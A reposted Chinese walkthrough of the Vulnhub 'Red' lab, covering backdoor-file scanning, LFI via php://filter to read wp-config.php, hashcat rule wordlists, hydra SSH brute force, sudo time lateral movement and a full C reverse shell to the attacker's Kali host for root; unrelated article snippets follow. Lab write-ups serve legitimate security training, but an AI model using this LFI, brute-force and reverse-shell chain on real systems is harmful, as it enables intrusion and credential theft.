[Vulnhub]靶场 Red

news2024/11/24 15:20:37

kali:192.168.56.104

主机发现

arp-scan -l
# arp-scan -l                             
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:ed:b4:24       PCS Systemtechnik GmbH
192.168.56.112  08:00:27:89:06:41       PCS Systemtechnik GmbH

靶机:192.168.56.112

端口扫描

nmap -p- 192.168.56.112
# nmap -p- 192.168.56.112
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-03 16:22 CST
Nmap scan report for 192.168.56.112
Host is up (0.00076s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

开启了22 80端口

进入web发现是个wordpress服务,并且提示由后门文件

源码里面发现了域名

<link rel='dns-prefetch' href='//redrocks.win' />

kali 添加hosts

192.168.56.112 redrocks.win

先扫一下目录,kali自带一个后门字典

gobuster dir -u http://redrocks.win -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
# gobuster dir -u http://redrocks.win -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://redrocks.win
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 422 / 423 (99.76%)
/NetworkFileManagerPHP.php (Status: 500) [Size: 0]

有个NetworkFileManagerPHP.php文件

fuzzu一下参数

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=123' -fs 0

爆破出来参数是key,并且发现可以LFI

直接包含NetworkFileManagerPHP.php失败,用php伪协议包含

http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=NetworkFileManagerPHP.php

base64解码

<?php
   $file = $_GET['key'];
   if(isset($file))
   {
       include("$file");
   }
   else
   {
       include("NetworkFileManagerPHP.php");
   }
   /* VGhhdCBwYXNzd29yZCBhbG9uZSB3b24ndCBoZWxwIHlvdSEgSGFzaGNhdCBzYXlzIHJ1bGVzIGFyZSBydWxlcw== */
?>

注释由一段base64字符串,解码得到

That password alone won't help you! Hashcat says rules are rules

包含一下wp配置文件看看密码是什么

http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'john' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define('FS_METHOD', 'direct');

define('WP_SITEURL', 'http://redrocks.win');
define('WP_HOME', 'http://redrocks.win');

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '2uuBvc8SO5{>UwQ<^5V5[UHBw%N}-BwWqw|><*HfBwJ( $&%,(Zbg/jwFkRHf~v|');
define('SECURE_AUTH_KEY',  'ah}<I`52GL6C^@~x C9FpMq-)txgOmA<~{R5ktY/@.]dBF?keB3}+Y^u!a54 Xc(');
define('LOGGED_IN_KEY',    '[a!K}D<7-vB3Y&x_<3e]Wd+J]!o+A:U@QUZ-RU1]tO@/N}b}R@+/$+u*pJ|Z(xu-');
define('NONCE_KEY',        ' g4|@~:h,K29D}$FL-f/eujw(VT;8wa7xRWpVR: >},]!Ez.48E:ok 8Ip~5_o+a');
define('AUTH_SALT',        'a;,O<~vbpL+|@W+!Rs1o,T$r9(LwaXI =I7ZW$.Z[+BQ=B6QG7nr+w_bQ6B]5q4c');
define('SECURE_AUTH_SALT', 'GkU:% Lo} 9}w38i:%]=uq&J6Z&RR#v2vsB5a_ +.[us;6mE+|$x*+ D*Ke+:Nt:');
define('LOGGED_IN_SALT',   '#`F9&pm_jY}N3y0&8Z]EeL)z,$39,yFc$Nq`jGOMT_aM*`<$9A:9<Kk^L}fX@+iZ');
define('NONCE_SALT',       'hTlFE*6zlZMbqluz)hf:-:x-:l89fC4otci;38|i`7eU1;+k[!0[ZG.oCt2@-y3X');

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

用户名 john,密码R3v_m4lwh3r3_k1nG!!

ssh尝试连接,失败

提示Hashcat says rules are rules

用hashcat 里面的base64规则生成碰撞字典

password.txt里面是R3v_m4lwh3r3_k1nG!!,passwords.txt是利用base64规则生成的字典

hashcat --stdout password.txt -r /usr/share/hashcat/rules/best64.rule > passwords.txt
# hashcat --stdout password.txt -r /usr/share/hashcat/rules/best64.rule > passwords.txt
                                                                                                                                                                                                                       
┌──(root㉿kali2)-[~/Desktop]
└─# cat password     
cat: password: No such file or directory
                                                                                                                                                                                                                       
┌──(root㉿kali2)-[~/Desktop]
└─# cat passwords.txt
R3v_m4lwh3r3_k1nG!!
!!Gn1k_3r3hwl4m_v3R
R3V_M4LWH3R3_K1NG!!
r3v_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!0
R3v_m4lwh3r3_k1nG!!1
....

然后用hydra爆破一下

hydra -l john -P passwords.txt 192.168.56.112 ssh

爆破出来密码是R3v_m4lwh3r3_k1nG!!00

在john目录下,发现一个note.txt,但是cat的时候却弹出vi的界面,根据提示,vi和cat指令互换

john@red:~$ sudo -l
Matching Defaults entries for john on red:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on red:
    (ippsec) NOPASSWD: /usr/bin/time

发现/usr/bin/time可以横向到ippsec

直接

sudo -u ippsec /usr/bin/time /bin/bash
ippsec@red:/var/www/wordpress/.git$ ls -al
ls -al
total 32
drwxrwx--- 2 root     ippsec    4096 Mar  3 09:48 .
drwxr-xr-x 6 www-data www-data  4096 Oct 31  2021 ..
-rwxr-xr-x 1 root     root     16712 Mar  3 09:48 rev
-rw-r--r-- 1 root     root       123 Oct 31  2021 supersecretfileuc.c

在/var/www/wordpress/.git发现有个后门程序

并且是root权限,rev文件是supersecretfileuc.c编译而成,会自动弹出那些干扰信息,删除rev没用,

删除后还会自动编译,但是可以替换supersecretfileuc.c,替换成反弹shell的c,编译执行的时候,rootshell就能反弹到kali上

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = 4567;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;       
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("192.168.56.104");

    connect(sockt, (struct sockaddr *) &revsockaddr, 
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"sh", NULL};
    execve("/bin/bash", argv, NULL);

    return 0;       
}

用wget从kali上获取

ippsec@red:/var/www/wordpress/.git$ wget http://192.168.56.104:6677/exp.c
wget http://192.168.56.104:6677/exp.c
--2024-03-03 09:53:54--  http://192.168.56.104:6677/exp.c
Connecting to 192.168.56.104:6677... connected.
HTTP request sent, awaiting response... 200 OK
Length: 669 [text/x-csrc]
Saving to: ‘exp.c’

     0K                                                       100% 74.4M=0s

2024-03-03 09:53:54 (74.4 MB/s) - ‘exp.c’ saved [669/669]

ippsec@red:/var/www/wordpress/.git$ 

ippsec@red:/var/www/wordpress/.git$ ls 
ls 
exp.c
rev
supersecretfileuc.c

然后删除原来的c程序和rev

ippsec@red:/var/www/wordpress/.git$ rm supersecretfileuc.c
rm supersecretfileuc.c
ippsec@red:/var/www/wordpress/.git$ rm rev
rm rev
ippsec@red:/var/www/wordpress/.git$ mv exp.c supersecretfileuc.c
mv exp.c supersecretfileuc.c
ippsec@red:/var/www/wordpress/.git$ ls 
ls 
supersecretfileuc.c

编译不编译无所谓,我这里顺便编译了一下

gcc supersecretfileuc.c -o rev

kali开个监听端口就能 弹回rootshell

# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.112] 51414
whoami
root
cd /root
ls
defense
root.txt
snap

这靶场有点恶心,一直断开连接,我连了n次才完成。

总结1.后门文件扫描

        2.参数fuzz

        3.hashcat生成字典

        4.time提权

        5.文件名劫持

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1489103.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

带你从Spark官网啃透Spark Structured Streaming

By 远方时光原创&#xff0c;可转载&#xff0c;open 合作微信公众号&#xff1a;大数据左右手 本文是基于spark官网结构化流解读 Structured Streaming Programming Guide - Spark 3.5.1 Documentation (apache.org) spark官网对结构化流解释 我浓缩了一些关键信息&#xff…

LCR 134. Pow(x, n)

解题思路&#xff1a; 分治 快速幂 Java中向下取整n/2即可 需要结合下图理解&#xff0c;算法就是实现的该过程 class Solution {public double myPow(double x, int n) {if(x 0.0f) return 0.0d;long b n;double res 1.0;//例如:2^-5(1/2)^5if(b < 0) {x 1 / x;b -b…

嵌入式中很多MCU公司,为什么都是仿STM32?

做了单片机开发十多年了&#xff0c;STM32是我用过的单片机里面&#xff0c;最省心的。 用STM32做过的产品&#xff0c;至少10几个以上了。 其实不仅仅是STM32&#xff0c;还有STM8系列&#xff0c;也很稳。 我们无际单片机特训营好几个项目&#xff0c;都用了STM8和STM32系…

挂耳式蓝牙耳机性价比推荐,六大必备选购策略全揭秘!

生活水平的提升往往伴随着个人素质的增长。在公共场合&#xff0c;越来越多的人选择佩戴耳机&#xff0c;以避免打扰他人&#xff0c;同时也追求个人的舒适体验。挂耳式蓝牙耳机因其独特的设计成为了新宠。这类耳机不压迫耳道&#xff0c;提供自然的声音体验&#xff0c;同时确…

【卡尔曼滤波】图文结合带你详细推导卡尔曼滤波(超详解)

大家好&#xff0c;好久不见&#xff0c;我是小政。读研期间&#xff0c;我的研究方向是协作定位&#xff0c;涉及到多机器人分布式融合&#xff0c;主要用到了卡尔曼滤波&#xff0c;CI融合等概念。卡尔曼滤波我也是研究了很久&#xff0c;一直在思考的问题就是&#xff0c;卡…

Chat GPT:AI聊天机器人的革命性突破!

一、引言 近年来&#xff0c;人工智能&#xff08;AI&#xff09;技术的发展日新月异&#xff0c;其中最具代表性的成果之一便是Chat GPT。这款基于自然语言处理&#xff08;NLP&#xff09;技术的聊天机器人&#xff0c;以其高度智能、灵活多变的特点&#xff0c;迅速吸引了全…

Linux 学习笔记(11)

十一、 资源监控 1 、 free 内存监控 语 法&#xff1a; free [-bkmotV][-s < 间隔秒数 >] 补充说明&#xff1a; free 指令会显示内存的使用情况&#xff0c;包括实体内存&#xff0c;虚拟的交换文件内存&#xff0c;共享内存区段&#xff0c;以 及系统核心使用的…

智慧城市建设的新里程碑:公共服务电子支付大屏

随着科技的飞速发展&#xff0c;我们的生活正在经历前所未有的变革。电子支付的出现&#xff0c;无疑是这场变革中的一大亮点&#xff0c;它不仅改变了我们日常的支付方式&#xff0c;更成为智慧城市建设的重要一环&#xff0c;为公众提供了更加便捷、高效的服务体验。 在以前&…

【开源】SpringBoot框架开发民宿预定管理系统

目录 一、摘要1.1 项目介绍1.2 项目录屏 二、功能模块2.1 用例设计2.2 功能设计2.2.1 租客角色2.2.2 房主角色2.2.3 系统管理员角色 三、系统展示四、核心代码4.1 查询民宿4.2 新增民宿4.3 新增民宿评价4.4 查询留言4.5 新增民宿订单 五、免责说明 一、摘要 1.1 项目介绍 基于…

java找工作之Mybatis(入门及xml配置相关)

Mybatis 学习Mybatis就要学会查看官网&#xff0c;官网地址如下&#xff1a;<MyBatis中文网 > 1、简介 1.1什么是Mybatis MyBatis 是一款优秀的持久层框架&#xff0c;它支持自定义 SQL、存储过程以及高级映射。MyBatis 免除了几乎所有的 JDBC 代码以及设置参数和获取…

数据库之间数据迁移工具datax

简介 DataX 是阿里云 DataWorks数据集成 的开源版本&#xff0c;在阿里巴巴集团内被广泛使用的离线数据同步工具/平台。DataX 实现了包括 MySQL、Oracle、OceanBase、SqlServer、Postgre、HDFS、Hive、ADS、HBase、TableStore(OTS)、MaxCompute(ODPS)、Hologres、DRDS, databe…

LeetCode刷题-206.反转链表【递归实现】

206.反转链表 题目 给你单链表的头节点 head &#xff0c;请你反转链表&#xff0c;并返回反转后的链表。 示例 示例1 输入&#xff1a;head [1,2,3,4,5] 输出&#xff1a;[5,4,3,2,1]示例2 输入&#xff1a;head [1,2] 输出&#xff1a;[2,1]示例3 输入&#xff1a;hea…

MySQL字符集和比较规则

MySQL字符集和比较规则 字符集和比较规则简介 字符集&#xff1a; 描述字符与二进制数据的映射关系 比较规则&#xff1a;比较指定字符集中的字符的规则 字符集 我们知道&#xff0c;计算机无法直接存储字符串&#xff0c;实际存储的都是二进制数据。字符集是有限的&#xff…

【CSP试题回顾】201409-1-相邻数对

CSP-201409-1-相邻数对 解题代码 #include <iostream> #include <vector> using namespace std;vector<int>arr; int num;int main() {ios_base::sync_with_stdio(false);cin.tie(0);cout.tie(0);int n;cin >> n;for (int i 0; i < n; i){int t;…

C#常识篇(二)

委托和事件的区别 委托可以认为是对指定签名的函数的引用&#xff0c;通过委托可以实现将函数作为参数传递或者间接调用函数&#xff0c;委托是类型安全的&#xff0c;仅指向与其声明时指定签名相匹配的函数。委托可以分为单播委托和多播委托&#xff0c;二者的区别在于是对单个…

WEB APIs (5)

window对象 BOM&#xff08;浏览器对象模型&#xff09; 其为js操作浏览器提供了方法 window对象是一个全局变量&#xff0c;是BOM树根节点 BOM的属性和方法都是window的&#xff0c;如document、console.log()等 var定义在全局全局作用域中的变量、函数都会变成window对象…

参数引入和全局变量引入实现-目标和

LCR 102. 目标和 - 力扣&#xff08;LeetCode&#xff09; 分析题意&#xff0c;画出决策树&#xff0c;其他的思路都跟前面讲过的类似&#xff1a; 全局变量引入实现&#xff1a; 全局变量的引入&#xff0c;需要手动处理回溯&#xff1b; class Solution {int ret; //…

群晖Synology Drive服务搭建结合内网穿透实现云同步Obsidian笔记文件夹

&#x1f308;个人主页: Aileen_0v0 &#x1f525;热门专栏: 华为鸿蒙系统学习|计算机网络|数据结构与算法 ​&#x1f4ab;个人格言:“没有罗马,那就自己创造罗马~” #mermaid-svg-ebec69DBjtGk7apF {font-family:"trebuchet ms",verdana,arial,sans-serif;font-siz…

Linux:进度条的实现

使用工具的简单介绍&#xff1a; 在创建进度条之前&#xff0c;首先要明白两个工具&#xff0c;fflush 和 \r 。 \r 回车键的功能其实是两个&#xff0c;一个是换行&#xff0c;一个是回车。所谓换行就是将光标从这一行变到下一行中&#xff0c;且是垂直下落&#xff0c…

【详识JAVA语言】类和对象

面向对象的初步认知 什么是面向对象 Java是一门纯面向对象的语言(Object Oriented Program&#xff0c;简称OOP)&#xff0c;在面向对象的世界里&#xff0c;一切皆为对象。面向对象是解决问题的一种思想&#xff0c;主要依靠对象之间的交互完成一件事情。用面向对象的思想来…